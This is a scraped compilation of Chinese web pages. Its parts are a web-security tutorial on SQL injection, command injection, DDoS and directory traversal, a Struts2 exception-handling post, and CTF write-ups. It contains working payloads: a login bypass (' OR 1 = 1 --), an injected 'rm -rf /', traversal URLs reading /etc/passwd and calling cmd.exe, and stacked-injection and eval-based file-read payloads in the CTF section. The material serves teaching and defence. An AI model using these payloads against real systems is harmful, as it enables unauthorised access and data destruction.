csrfToken,提交表单的时候,带上 csrfToken,然后在后端做 csrfToken 验证。 CSRF 的防御可以根据应用场景的不同自行选择。CSRF 的防御工作确实会在正常业务逻辑的基础上带来很多额外的开发量,但是这种工作量是值得的,毕竟用户隐私以及财产安全是产品最基础的根本。 SQL 注入 SQL 注入漏洞(SQL Injection)是 Web 开发中最常见的一种安全漏洞。可以用它来从数据库获取敏感信息,或者利用数据库的特性执行添加用户,导出文件等一系列恶意操作,甚至有可能获取数据库乃至系统用户最高权限。 而造成 SQL 注入的原因是因为程序没有有效的转义过滤用户的输入,使攻击者成功的向服务器提交恶意的 SQL 查询代码,程序在接收后错误的将攻击者的输入作为查询语句的一部分执行,导致原始的查询逻辑被改变,额外的执行了攻击者精心构造的恶意代码。 很多 Web 开发者没有意识到 SQL 查询是可以被篡改的,从而把 SQL 查询当作可信任的命令。殊不知,SQL 查询是可以绕开访问控制,从而绕过身份验证和权限检查的。更有甚者,有可能通过 SQL 查询去运行主机系统级的命令。 SQL 注入原理 下面将通过一些真实的例子来详细讲解 SQL 注入的方式的原理。 考虑以下简单的管理员登录表单: <form action="/login" method="POST"><p>Username: <input type="text" name="username" /></p><p>Password: <input type="password" name="password" /></p><p><input type="submit" value="登陆" /></p></form> 后端的 SQL 语句可能是如下这样的: let querySQL = SELECT FROM userWHERE username='${username}'AND psw='${password}'; // 接下来就是执行 sql 语句… 目的就是来验证用户名和密码是不是正确,按理说乍一看上面的 SQL 语句也没什么毛病,确实是能够达到我们的目的,可是你只是站在用户会老老实实按照你的设计来输入的角度来看问题,如果有一个恶意攻击者输入的用户名是 zoumiaojiang’ OR 1 = 1 --,密码随意输入,就可以直接登入系统了。WFT! 冷静下来思考一下,我们之前预想的真实 SQL 语句是: SELECT FROM user WHERE username='zoumiaojiang' AND psw='mypassword' 可以恶意攻击者的奇怪用户名将你的 SQL 语句变成了如下形式: SELECT FROM user WHERE username='zoumiaojiang' OR 1 = 1 --' AND psw='xxxx' 在 SQL 中,-- 是注释后面的内容的意思,所以查询语句就变成了: SELECT FROM user WHERE username='zoumiaojiang' OR 1 = 1 这条 SQL 语句的查询条件永远为真,所以意思就是恶意攻击者不用我的密码,就可以登录进我的账号,然后可以在里面为所欲为,然而这还只是最简单的注入,牛逼的 SQL 注入高手甚至可以通过 SQL 查询去运行主机系统级的命令,将你主机里的内容一览无余,这里我也没有这个能力讲解的太深入,毕竟不是专业研究这类攻击的,但是通过以上的例子,已经了解了 SQL 注入的原理,我们基本已经能找到防御 SQL 注入的方案了。 如何预防 SQL 注入 防止 SQL 注入主要是不能允许用户输入的内容影响正常的 SQL 语句的逻辑,当用户的输入的信息将要用来拼接 SQL 语句的话,我们应该永远选择不相信,任何内容都必须进行转义过滤,当然做到这个还是不够的,下面列出防御 SQL 注入的几点注意事项: 严格限制Web应用的数据库的操作权限,给此用户提供仅仅能够满足其工作的最低权限,从而最大限度的减少注入攻击对数据库的危害 后端代码检查输入的数据是否符合预期,严格限制变量的类型,例如使用正则表达式进行一些匹配处理。 对进入数据库的特殊字符(’,",\,<,>,&,,; 等)进行转义处理,或编码转换。基本上所有的后端语言都有对字符串进行转义处理的方法,比如 lodash 的 lodash._escapehtmlchar 库。 所有的查询语句建议使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到 SQL 语句中,即不要直接拼接 SQL 语句。例如 Node.js 中的 mysqljs 库的 query 方法中的 ? 占位参数。 mysql.query(SELECT FROM user WHERE username = ? AND psw = ?, [username, psw]); 在应用发布之前建议使用专业的 SQL 注入检测工具进行检测,以及时修补被发现的 SQL 注入漏洞。网上有很多这方面的开源工具,例如 sqlmap、SQLninja 等。 避免网站打印出 SQL 错误信息,比如类型错误、字段不匹配等,把代码里的 SQL 语句暴露出来,以防止攻击者利用这些错误信息进行 SQL 注入。 不要过于细化返回的错误信息,如果目的是方便调试,就去使用后端日志,不要在接口上过多的暴露出错信息,毕竟真正的用户不关心太多的技术细节,只要话术合理就行。 碰到要操作的数据库的代码,一定要慎重,小心使得万年船,多找几个人多来几次 code review,将问题都暴露出来,而且要善于利用工具,操作数据库相关的代码属于机密,没事不要去各种论坛晒自家站点的 SQL 语句,万一被人盯上了呢? 命令行注入 命令行注入漏洞,指的是攻击者能够通过 HTTP 请求直接侵入主机,执行攻击者预设的 shell 命令,听起来好像匪夷所思,这往往是 Web 开发者最容易忽视但是却是最危险的一个漏洞之一,看一个实例: 假如现在需要实现一个需求:用户提交一些内容到服务器,然后在服务器执行一些系统命令去产出一个结果返回给用户,接口的部分实现如下: // 以 Node.js 为例,假如在接口中需要从 github 下载用户指定的 repoconst exec = require('mz/child_process').exec;let params = {/ 用户输入的参数 /};exec(git clone ${params.repo} /some/path); 这段代码确实能够满足业务需求,正常的用户也确实能从指定的 git repo 上下载到想要的代码,可是和 SQL 注入一样,这段代码在恶意攻击者眼中,简直就是香饽饽。 如果 params.repo 传入的是 https://github.com/zoumiaojiang/zoumiaojiang.github.io.git 当然没问题了。 可是如果 params.repo 传入的是 https://github.com/xx/xx.git && rm -rf / && 恰好你的服务是用 root 权限起的就惨了。 具体恶意攻击者能用命令行注入干什么也像 SQL 注入一样,手法是千变万化的,比如「反弹 shell 注入」等,但原理都是一样的,我们绝对有能力防止命令行注入发生。防止命令行注入需要做到以下几件事情: 后端对前端提交内容需要完全选择不相信,并且对其进行规则限制(比如正则表达式)。 在调用系统命令前对所有传入参数进行命令行参数转义过滤。 不要直接拼接命令语句,借助一些工具做拼接、转义预处理,例如 Node.js 的 shell-escape npm 包。 还是前面的例子,我们可以做到如下: const exec = require('mz/child_process').exec;// 借助 shell-escape npm 包解决参数转义过滤问题const shellescape = require('shell-escape');let params = {/ 用户输入的参数 /};// 先过滤一下参数,让参数符合预期if (!/正确的表达式/.test(params.repo)) {return;}let cmd = shellescape(['git','clone',params.repo,'/some/path']);// cmd 的值: git clone 'https://github.com/xx/xx.git && rm -rf / &&' /some/path// 这样就不会被注入成功了。exec(cmd); DDoS 攻击 DDoS 又叫分布式拒绝服务,全称 Distributed Denial of Service,其原理就是利用大量的请求造成资源过载,导致服务不可用,这个攻击应该不能算是安全问题,这应该算是一个另类的存在,因为这种攻击根本就是耍流氓的存在,「伤敌一千,自损八百」的行为。出于保护 Web App 不受攻击的攻防角度,还是介绍一下 DDoS 攻击吧,毕竟也是挺常见的。 DDoS 攻击可以理解为:「你开了一家店,隔壁家点看不惯,就雇了一大堆黑社会人员进你店里干坐着,也不消费,其他客人也进不来,导致你营业惨淡」。为啥说 DDoS 是个「伤敌一千,自损八百」的行为呢?毕竟隔壁店还是花了不少钱雇黑社会但是啥也没得到不是?DDoS 攻击的目的基本上就以下几个: 深仇大恨,就是要干死你 敲诈你,不给钱就干你 忽悠你,不买我防火墙服务就会有“人”继续干你 也许你的站点遭受过 DDoS 攻击,具体什么原因怎么解读见仁见智。DDos 攻击从层次上可分为网络层攻击与应用层攻击,从攻击手法上可分为快型流量攻击与慢型流量攻击,但其原理都是造成资源过载,导致服务不可用。 网络层 DDoS 网络层 DDos 攻击包括 SYN Flood、ACK Flood、UDP Flood、ICMP Flood 等。 SYN Flood 攻击 SYN flood 攻击主要利用了 TCP 三次握手过程中的 Bug,我们都知道 TCP 三次握手过程是要建立连接的双方发送 SYN,SYN + ACK,ACK 数据包,而当攻击方随意构造源 IP 去发送 SYN 包时,服务器返回的 SYN + ACK 就不能得到应答(因为 IP 是随意构造的),此时服务器就会尝试重新发送,并且会有至少 30s 的等待时间,导致资源饱和服务不可用,此攻击属于慢型 DDoS 攻击。 ACK Flood 攻击 ACK Flood 攻击是在 TCP 连接建立之后,所有的数据传输 TCP 报文都是带有 ACK 标志位的,主机在接收到一个带有 ACK 标志位的数据包的时候,需要检查该数据包所表示的连接四元组是否存在,如果存在则检查该数据包所表示的状态是否合法,然后再向应用层传递该数据包。如果在检查中发现该数据包不合法,例如该数据包所指向的目的端口在本机并未开放,则主机操作系统协议栈会回应 RST 包告诉对方此端口不存在。 UDP Flood 攻击 UDP flood 攻击是由于 UDP 是一种无连接的协议,因此攻击者可以伪造大量的源 IP 地址去发送 UDP 包,此种攻击属于大流量攻击。正常应用情况下,UDP 包双向流量会基本相等,因此发起这种攻击的攻击者在消耗对方资源的时候也在消耗自己的资源。 ICMP Flood 攻击 ICMP Flood 攻击属于大流量攻击,其原理就是不断发送不正常的 ICMP 包(所谓不正常就是 ICMP 包内容很大),导致目标带宽被占用,但其本身资源也会被消耗。目前很多服务器都是禁 ping 的(在防火墙在可以屏蔽 ICMP 包),因此这种攻击方式已经落伍。 网络层 DDoS 防御 网络层的 DDoS 攻击究其本质其实是无法防御的,我们能做得就是不断优化服务本身部署的网络架构,以及提升网络带宽。当然,还是做好以下几件事也是有助于缓解网络层 DDoS 攻击的冲击: 网络架构上做好优化,采用负载均衡分流。 确保服务器的系统文件是最新的版本,并及时更新系统补丁。 添加抗 DDos 设备,进行流量清洗。 限制同时打开的 SYN 半连接数目,缩短 SYN 半连接的 Timeout 时间。 限制单 IP 请求频率。 防火墙等防护设置禁止 ICMP 包等。 严格限制对外开放的服务器的向外访问。 运行端口映射程序或端口扫描程序,要认真检查特权端口和非特权端口。 关闭不必要的服务。 认真检查网络设备和主机/服务器系统的日志。只要日志出现漏洞或是时间变更,那这台机器就可能遭到了攻击。 限制在防火墙外与网络文件共享。这样会给黑客截取系统文件的机会,主机的信息暴露给黑客,无疑是给了对方入侵的机会。 加钱堆机器。。 报警。。 应用层 DDoS 应用层 DDoS 攻击不是发生在网络层,是发生在 TCP 建立握手成功之后,应用程序处理请求的时候,现在很多常见的 DDoS 攻击都是应用层攻击。应用层攻击千变万化,目的就是在网络应用层耗尽你的带宽,下面列出集中典型的攻击类型。 CC 攻击 当时绿盟为了防御 DDoS 攻击研发了一款叫做 Collapasar 的产品,能够有效的防御 SYN Flood 攻击。黑客为了挑衅,研发了一款 Challenge Collapasar 攻击工具(简称 CC)。 CC 攻击的原理,就是针对消耗资源比较大的页面不断发起不正常的请求,导致资源耗尽。因此在发送 CC 攻击前,我们需要寻找加载比较慢,消耗资源比较多的网页,比如需要查询数据库的页面、读写硬盘文件的等。通过 CC 攻击,使用爬虫对某些加载需要消耗大量资源的页面发起 HTTP 请求。 DNS Flood DNS Flood 攻击采用的方法是向被攻击的服务器发送大量的域名解析请求,通常请求解析的域名是随机生成或者是网络世界上根本不存在的域名,被攻击的DNS 服务器在接收到域名解析请求的时候首先会在服务器上查找是否有对应的缓存,如果查找不到并且该域名无法直接由服务器解析的时候,DNS 服务器会向其上层 DNS 服务器递归查询域名信息。域名解析的过程给服务器带来了很大的负载,每秒钟域名解析请求超过一定的数量就会造成 DNS 服务器解析域名超时。 根据微软的统计数据,一台 DNS 服务器所能承受的动态域名查询的上限是每秒钟 9000 个请求。而我们知道,在一台 P3 的 PC 机上可以轻易地构造出每秒钟几万个域名解析请求,足以使一台硬件配置极高的 DNS 服务器瘫痪,由此可见 DNS 服务器的脆弱性。 HTTP 慢速连接攻击 针对 HTTP 协议,先建立起 HTTP 连接,设置一个较大的 Conetnt-Length,每次只发送很少的字节,让服务器一直以为 HTTP 头部没有传输完成,这样连接一多就很快会出现连接耗尽。 应用层 DDoS 防御 判断 User-Agent 字段(不可靠,因为可以随意构造) 针对 IP + cookie,限制访问频率(由于 cookie 可以更改,IP 可以使用代理,或者肉鸡,也不可靠) 关闭服务器最大连接数等,合理配置中间件,缓解 DDoS 攻击。 请求中添加验证码,比如请求中有数据库操作的时候。 编写代码时,尽量实现优化,并合理使用缓存技术,减少数据库的读取操作。 加钱堆机器。。 报警。。 应用层的防御有时比网络层的更难,因为导致应用层被 DDoS 攻击的因素非常多,有时往往是因为程序员的失误,导致某个页面加载需要消耗大量资源,有时是因为中间件配置不当等等。而应用层 DDoS 防御的核心就是区分人与机器(爬虫),因为大量的请求不可能是人为的,肯定是机器构造的。因此如果能有效的区分人与爬虫行为,则可以很好地防御此攻击。 其他 DDoS 攻击 发起 DDoS 也是需要大量的带宽资源的,但是互联网就像森林,林子大了什么鸟都有,DDoS 攻击者也能找到其他的方式发起廉价并且极具杀伤力的 DDoS 攻击。 利用 XSS 举个例子,如果 12306 页面有一个 XSS 持久型漏洞被恶意攻击者发现,只需在春节抢票期间在这个漏洞中执行脚本使得往某一个小站点随便发点什么请求,然后随着用户访问的增多,感染用户增多,被攻击的站点自然就会迅速瘫痪了。这种 DDoS 简直就是无本万利,不用惊讶,现在大站有 XSS 漏洞的不要太多。 来自 P2P 网络攻击 大家都知道,互联网上的 P2P 用户和流量都是一个极为庞大的数字。如果他们都去一个指定的地方下载数据,成千上万的真实 IP 地址连接过来,没有哪个设备能够支撑住。拿 BT 下载来说,伪造一些热门视频的种子,发布到搜索引擎,就足以骗到许多用户和流量了,但是这只是基础攻击。 高级的 P2P 攻击,是直接欺骗资源管理服务器。如迅雷客户端会把自己发现的资源上传到资源管理服务器,然后推送给其它需要下载相同资源的用户,这样,一个链接就发布出去。通过协议逆向,攻击者伪造出大批量的热门资源信息通过资源管理中心分发出去,瞬间就可以传遍整个 P2P 网络。更为恐怖的是,这种攻击是无法停止的,即使是攻击者自身也无法停止,攻击一直持续到 P2P 官方发现问题更新服务器且下载用户重启下载软件为止。 最后总结下,DDoS 不可能防的住,就好比你的店只能容纳 50 人,黑社会有 100 人,你就换一家大店,能容纳 500 人,然后黑社会又找来了 1000 人,这种堆人头的做法就是 DDoS 本质上的攻防之道,「道高一尺,魔高一丈,魔高一尺,道高一丈」,讲真,必要的时候就答应勒索你的人的条件吧,实在不行就报警吧。 流量劫持 流量劫持应该算是黑产行业的一大经济支柱了吧?简直是让人恶心到吐,不吐槽了,还是继续谈干货吧,流量劫持基本分两种:DNS 劫持 和 HTTP 劫持,目的都是一样的,就是当用户访问 zoumiaojiang.com 的时候,给你展示的并不是或者不完全是 zoumiaojiang.com 提供的 “内容”。 DNS 劫持 DNS 劫持,也叫做域名劫持,可以这么理解,「你打了一辆车想去商场吃饭,结果你打的车是小作坊派来的,直接给你拉到小作坊去了」,DNS 的作用是把网络地址域名对应到真实的计算机能够识别的 IP 地址,以便计算机能够进一步通信,传递网址和内容等。如果当用户通过某一个域名访问一个站点的时候,被篡改的 DNS 服务器返回的是一个恶意的钓鱼站点的 IP,用户就被劫持到了恶意钓鱼站点,然后继而会被钓鱼输入各种账号密码信息,泄漏隐私。 dns劫持 这类劫持,要不就是网络运营商搞的鬼,一般小的网络运营商与黑产勾结会劫持 DNS,要不就是电脑中毒,被恶意篡改了路由器的 DNS 配置,基本上做为开发者或站长却是很难察觉的,除非有用户反馈,现在升级版的 DNS 劫持还可以对特定用户、特定区域等使用了用户画像进行筛选用户劫持的办法,另外这类广告显示更加随机更小,一般站长除非用户投诉否则很难觉察到,就算觉察到了取证举报更难。无论如何,如果接到有 DNS 劫持的反馈,一定要做好以下几件事: 取证很重要,时间、地点、IP、拨号账户、截屏、URL 地址等一定要有。 可以跟劫持区域的电信运营商进行投诉反馈。 如果投诉反馈无效,直接去工信部投诉,一般来说会加白你的域名。 HTTP 劫持 HTTP 劫持您可以这么理解,「你打了一辆车想去商场吃饭,结果司机跟你一路给你递小作坊的广告」,HTTP 劫持主要是当用户访问某个站点的时候会经过运营商网络,而不法运营商和黑产勾结能够截获 HTTP 请求返回内容,并且能够篡改内容,然后再返回给用户,从而实现劫持页面,轻则插入小广告,重则直接篡改成钓鱼网站页面骗用户隐私。能够实施流量劫持的根本原因,是 HTTP 协议没有办法对通信对方的身份进行校验以及对数据完整性进行校验。如果能解决这个问题,则流量劫持将无法轻易发生。所以防止 HTTP 劫持的方法只有将内容加密,让劫持者无法破解篡改,这样就可以防止 HTTP 劫持了。 HTTPS 协议就是一种基于 SSL 协议的安全加密网络应用层协议,可以很好的防止 HTTP 劫持。这里有篇 文章 讲的不错。HTTPS 在这就不深讲了,后面有机会我会单独好好讲讲 HTTPS。如果不想站点被 HTTP 劫持,赶紧将你的站点全站改造成 HTTPS 吧。 服务器漏洞 服务器除了以上提到的那些大名鼎鼎的漏洞和臭名昭著的攻击以外,其实还有很多其他的漏洞,往往也很容易被忽视,在这个小节也稍微介绍几种。 越权操作漏洞 如果你的系统是有登录控制的,那就要格外小心了,因为很有可能你的系统越权操作漏洞,越权操作漏洞可以简单的总结为 「A 用户能看到或者操作 B 用户的隐私内容」,如果你的系统中还有权限控制就更加需要小心了。所以每一个请求都需要做 userid 的判断 以下是一段有漏洞的后端示意代码: // ctx 为请求的 context 上下文let msgId = ctx.params.msgId;mysql.query('SELECT FROM msg_table WHERE msg_id = ?',[msgId]); 以上代码是任何人都可以查询到任何用户的消息,只要有 msg_id 就可以,这就是比较典型的越权漏洞,需要如下这么改进一下: // ctx 为请求的 context 上下文let msgId = ctx.params.msgId;let userId = ctx.session.userId; // 从会话中取出当前登陆的 userIdmysql.query('SELECT FROM msg_table WHERE msg_id = ? AND user_id = ?',[msgId, userId]); 嗯,大概就是这个意思,如果有更严格的权限控制,那在每个请求中凡是涉及到数据库的操作都需要先进行严格的验证,并且在设计数据库表的时候需要考虑进 userId 的账号关联以及权限关联。 目录遍历漏洞 目录遍历漏洞指通过在 URL 或参数中构造 …/,./ 和类似的跨父目录字符串的 ASCII 编码、unicode 编码等,完成目录跳转,读取操作系统各个目录下的敏感文件,也可以称作「任意文件读取漏洞」。 目录遍历漏洞原理:程序没有充分过滤用户输入的 …/ 之类的目录跳转符,导致用户可以通过提交目录跳转来遍历服务器上的任意文件。使用多个… 符号,不断向上跳转,最终停留在根 /,通过绝对路径去读取任意文件。 目录遍历漏洞几个示例和测试,一般构造 URL 然后使用浏览器直接访问,或者使用 Web 漏洞扫描工具检测,当然也可以自写程序测试。 http://somehost.com/../../../../../../../../../etc/passwdhttp://somehost.com/some/path?file=../../Windows/system.ini 借助 %00 空字符截断是一个比较经典的攻击手法http://somehost.com/some/path?file=../../Windows/system.ini%00.js 使用了 IIS 的脚本目录来移动目录并执行指令http://somehost.com/scripts/..%5c../Windows/System32/cmd.exe?/c+dir+c:\ 防御 方法就是需要对 URL 或者参数进行 …/,./ 等字符的转义过滤。 物理路径泄漏 物理路径泄露属于低风险等级缺陷,它的危害一般被描述为「攻击者可以利用此漏洞得到信息,来对系统进一步地攻击」,通常都是系统报错 500 的错误信息直接返回到页面可见导致的漏洞。得到物理路径有些时候它能给攻击者带来一些有用的信息,比如说:可以大致了解系统的文件目录结构;可以看出系统所使用的第三方软件;也说不定会得到一个合法的用户名(因为很多人把自己的用户名作为网站的目录名)。 防止这种泄漏的方法就是做好后端程序的出错处理,定制特殊的 500 报错页面。 源码暴露漏洞 和物理路径泄露类似,就是攻击者可以通过请求直接获取到你站点的后端源代码,然后就可以对系统进一步研究攻击。那么导致源代码暴露的原因是什么呢?基本上就是发生在服务器配置上了,服务器可以设置哪些路径的文件才可以被直接访问的,这里给一个 koa 服务起的例子,正常的 koa 服务器可以通过 koa-static 中间件去指定静态资源的目录,好让静态资源可以通过路径的路由访问。比如你的系统源代码目录是这样的: |- project|- src|- static|- ...|- server.js 你想要将 static 的文件夹配成静态资源目录,你应该会在 server.js 做如下配置: const Koa = require('koa');const serve = require('koa-static');const app = new Koa();app.use(serve(__dirname + '/project/static')); 但是如果配错了静态资源的目录,可能就出大事了,比如: // ...app.use(serve(__dirname + '/project')); 这样所有的源代码都可以通过路由访问到了,所有的服务器都提供了静态资源机制,所以在通过服务器配置静态资源目录和路径的时候,一定要注意检验,不然很可能产生漏洞。 最后,希望 Web 开发者们能够管理好自己的代码隐私,注意代码安全问题,比如不要将产品的含有敏感信息的代码放到第三方外部站点或者暴露给外部用户,尤其是前端代码,私钥类似的保密性的东西不要直接输出在代码里或者页面中。也许还有很多值得注意的点,但是归根结底还是绷住安全那根弦,对待每一行代码都要多多推敲。 请关注我的订阅号 本篇文章为转载内容。原文链接:https://blog.csdn.net/MrCoderStack/article/details/88547919。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-01-03 14:51:12
493
转载
Struts2
...朋友,今天咱们来聊聊Struts2中的异常处理与翻译问题。这真的是我最近在项目里碰到的大麻烦,费了好大劲儿四处摸索,总算找到些解决的办法了。希望这篇文章能够帮助到正在为这个问题头疼的你。 2. Struts2中的异常处理 2.1 为什么需要异常处理? 在实际开发过程中,我们经常会遇到各种各样的异常,比如用户输入错误、数据库连接失败等。如果这些异常没有得到妥善处理,轻则程序崩溃,重则导致数据丢失。所以嘛,咱们得在程序里加点异常处理的小聪明,这样不仅能保证程序稳如老狗,还能让用户体验棒棒的。 2.2 Struts2中的异常处理机制 Struts2提供了多种异常处理机制,其中最常用的就是ExceptionMappingInterceptor。它可以在这个拦截器链里抓住并处理异常,然后根据异常的类型,把请求转到不同的操作或者视图上。 代码示例 xml com.example.MyException=errorPage /error.jsp 在这个例子中,当ExampleAction抛出MyException时,程序会跳转到errorPage页面进行错误处理。 3. ExceptionTranslationFilterException详解 3.1 什么是ExceptionTranslationFilterException? ExceptionTranslationFilterException是Spring Security框架中的一种异常,通常在处理认证和授权时出现。不过呢,在用Struts2框架的时候,咱们有时候也会碰到这种错误。通常是因为设置不对或者是一些特别的环境问题在作怪。 3.2 如何处理ExceptionTranslationFilterException? 要解决这个问题,首先需要检查你的配置文件,确保所有的过滤器都正确地配置了。其次,可以尝试升级或降级相关库的版本,看看是否能解决问题。 代码示例 假设你有一个Spring Security配置文件: xml class="org.springframework.security.web.access.intercept.FilterSecurityInterceptor"> 确保这里的配置是正确的,并且所有相关的依赖库版本一致。 4. 异常翻译问题 4.1 为什么需要异常翻译? 在国际化应用中,我们经常需要将异常信息翻译成不同语言,以满足不同地区用户的需要。这不仅提高了用户体验,也使得我们的应用更具国际化视野。 4.2 如何实现异常翻译? Struts2提供了一种简单的方法来实现异常翻译,即通过配置struts.i18n.encoding属性来指定编码格式,以及通过struts.custom.i18n.resources属性来指定资源文件的位置。 代码示例 xml 在资源文件ApplicationResources.properties中定义异常消息: properties exception.message=An error occurred. exception.message.zh_CN=发生了一个错误。 这样,当系统抛出异常时,可以根据用户的语言环境自动选择合适的异常消息。 5. 结语 通过以上介绍,我相信你已经对Struts2中的异常处理和翻译问题有了更深入的理解。虽说这些问题可能会给我们添点麻烦,但只要咱们找对了方法,就能轻松搞定。希望这篇文章对你有所帮助! 最后,如果你在学习或工作中遇到了类似的问题,不要气馁,多查阅资料,多实践,相信你一定能够找到解决问题的办法。加油!
2025-01-24 16:12:41
124
海阔天空
转载文章
...;select 1 解析: 在oracle 缺省支持 通过 ‘ || ’ 来实现字符串拼接。但在mysql 缺省不支持。需要调整mysql 的sql_mode模式:pipes_as_concat 来实现oracle 的一些功能。 flag出来了 头秃 不是很懂 看了好多的wp… [GYCTF2020]Blacklist 进入题目链接 1.注入:1’ 为'闭合 2.看字段:1' order by 2 确认字段为2 3.查看回显:1’ union select 1,2 发现过滤字符 与上面的随便注很像 ,太像了,增加了过滤规则。 修改表名和set均不可用,所以很直接的想到了handler语句。 4.但依旧可以用堆叠注入获取数据库名称、表名、字段。 1';show databases 获取数据库名称1';show tables 获取表名1';show columns from FlagHere ; 或 1';desc FlagHere; 获取字段名 5.接下来用 handler语句读取内容。 1';handler FlagHere open;handler FlagHere read first 直接得到 flag 成功解题。 flag{d0c147ad-1d03-4698-a71c-4fcda3060f17} 补充handler语句相关。 mysql除可使用select查询表中的数据,也可使用handler语句 这条语句使我们能够一行一行的浏览一个表中的数据,不过handler语句并不 具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中 [GKCTF2020]cve版签到 查看提示 菜鸡的第一步 提示了:cve-2020-7066 赶紧去查了一下 cve-2020-7066PHP 7.2.29之前的7.2.x版本、7.3.16之前的7.3.x版本和7.4.4之前的7.4.x版本中的‘get_headers()’函数存在安全漏洞。攻击者可利用该漏洞造成信息泄露。 描述在低于7.2.29的PHP版本7.2.x,低于7.3.16的7.3.x和低于7.4.4的7.4.x中,将get_headers()与用户提供的URL一起使用时,如果URL包含零(\ 0)字符,则URL将被静默地截断。这可能会导致某些软件对get_headers()的目标做出错误的假设,并可能将某些信息发送到错误的服务器。 利用方法 总的来说也就是get_headers()可以被%00截断 进入题目链接 知识点: cve-2020-7066利用 老套路:先F12查看源码 发现提示:Flag in localhost 根据以上 直接上了 直接截断 因为提示host必须以123结尾,这个简单 所以需要将localhost替换为127.0.0.123 成功得到flag flag{bf1243d2-08dd-44ee-afe8-45f58e2d6801} GXYCTF2019禁止套娃 考点: .git源码泄露 无参RCE localeconv() 函数返回一包含本地数字及货币格式信息的数组。scandir() 列出 images 目录中的文件和目录。readfile() 输出一个文件。current() 返回数组中的当前单元, 默认取第一个值。pos() current() 的别名。next() 函数将内部指针指向数组中的下一个元素,并输出。array_reverse()以相反的元素顺序返回数组。highlight_file()打印输出或者返回 filename 文件中语法高亮版本的代码。 具体细节,看这里 进入题目链接 上御剑扫目录 发现是.git源码泄露 上githack补全源码 得到源码 <?phpinclude "flag.php";echo "flag在哪里呢?<br>";if(isset($_GET['exp'])){if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {// echo $_GET['exp'];@eval($_GET['exp']);}else{die("还差一点哦!");} }else{die("再好好想想!");} }else{die("还想读flag,臭弟弟!");} }// highlight_file(__FILE__);?> 既然getshell基本不可能,那么考虑读源码 看源码,flag应该就在flag.php 我们想办法读取 首先需要得到当前目录下的文件 scandir()函数可以扫描当前目录下的文件,例如: <?phpprint_r(scandir('.'));?> 那么问题就是如何构造scandir('.') 这里再看函数: localeconv() 函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是. current() 返回数组中的当前单元, 默认取第一个值。 pos() current() 的别名。 这里还有一个知识点: current(localeconv())永远都是个点 那么就很简单了 print_r(scandir(current(localeconv())));print_r(scandir(pos(localeconv()))); 第二步:读取flag所在的数组 之后我们利用array_reverse() 将数组内容反转一下,利用next()指向flag.php文件==>highlight_file()高亮输出 payload: ?exp=show_source(next(array_reverse(scandir(pos(localeconv()))))); [De1CTF 2019]SSRF Me 首先得到提示 还有源码 进入题目链接 得到一串py 经过整理后 ! /usr/bin/env pythonencoding=utf-8from flask import Flaskfrom flask import requestimport socketimport hashlibimport urllibimport sysimport osimport jsonreload(sys)sys.setdefaultencoding('latin1')app = Flask(__name__)secert_key = os.urandom(16)class Task:def __init__(self, action, param, sign, ip):python得构造方法self.action = actionself.param = paramself.sign = signself.sandbox = md5(ip)if(not os.path.exists(self.sandbox)): SandBox For Remote_Addros.mkdir(self.sandbox)def Exec(self):定义的命令执行函数,此处调用了scan这个自定义的函数result = {}result['code'] = 500if (self.checkSign()):if "scan" in self.action:action要写scantmpfile = open("./%s/result.txt" % self.sandbox, 'w')resp = scan(self.param) 此处是文件读取得注入点if (resp == "Connection Timeout"):result['data'] = respelse:print resp 输出结果tmpfile.write(resp)tmpfile.close()result['code'] = 200if "read" in self.action:action要加readf = open("./%s/result.txt" % self.sandbox, 'r')result['code'] = 200result['data'] = f.read()if result['code'] == 500:result['data'] = "Action Error"else:result['code'] = 500result['msg'] = "Sign Error"return resultdef checkSign(self):if (getSign(self.action, self.param) == self.sign): !!!校验return Trueelse:return Falsegenerate Sign For Action Scan.@app.route("/geneSign", methods=['GET', 'POST']) !!!这个路由用于测试def geneSign():param = urllib.unquote(request.args.get("param", "")) action = "scan"return getSign(action, param)@app.route('/De1ta',methods=['GET','POST'])这个路由是我萌得最终注入点def challenge():action = urllib.unquote(request.cookies.get("action"))param = urllib.unquote(request.args.get("param", ""))sign = urllib.unquote(request.cookies.get("sign"))ip = request.remote_addrif(waf(param)):return "No Hacker!!!!"task = Task(action, param, sign, ip)return json.dumps(task.Exec())@app.route('/')根目录路由,就是显示源代码得地方def index():return open("code.txt","r").read()def scan(param):这是用来扫目录得函数socket.setdefaulttimeout(1)try:return urllib.urlopen(param).read()[:50]except:return "Connection Timeout"def getSign(action, param):!!!这个应该是本题关键点,此处注意顺序先是param后是actionreturn hashlib.md5(secert_key + param + action).hexdigest()def md5(content):return hashlib.md5(content).hexdigest()def waf(param):这个waf比较没用好像check=param.strip().lower()if check.startswith("gopher") or check.startswith("file"):return Trueelse:return Falseif __name__ == '__main__':app.debug = Falseapp.run(host='0.0.0.0') 相关函数 作用 init(self, action, param, …) 构造方法self代表对象,其他是对象的属性 request.args.get(param) 提取get方法传入的,参数名叫param对应得值 request.cookies.get(“action”) 提取cookie信息中的,名为action得对应值 hashlib.md5().hexdigest() hashlib.md5()获取一个md5加密算法对象,hexdigest()是获得加密后的16进制字符串 urllib.unquote() 将url编码解码 urllib.urlopen() 读取网络文件参数可以是url json.dumps Python 对象编码成 JSON 字符串 这个题先放一下… [极客大挑战 2019]EasySQL 进入题目链接 直接上万能密码 用户随意 admin1' or 1; 得到flag flag{7fc65eb6-985b-494a-8225-de3101a78e89} [极客大挑战 2019]Havefun 进入题目链接 老套路 去F12看看有什么东西 很好 逮住了 获取FLAG的条件是cat=dog,且是get传参 flag就出来了 flag{779b8bac-2d64-4540-b830-1972d70a2db9} [极客大挑战 2019]Secret File 进入题目链接 老套路 先F12查看 发现超链接 直接逮住 既然已经查阅结束了 中间就肯定有一些我们不知道的东西 过去了 上burp看看情况 我们让他挺住 逮住了:secr3t.php 访问一下 简单的绕过 就可以了 成功得到一串字符 进行base解密即可 成功逮住flag 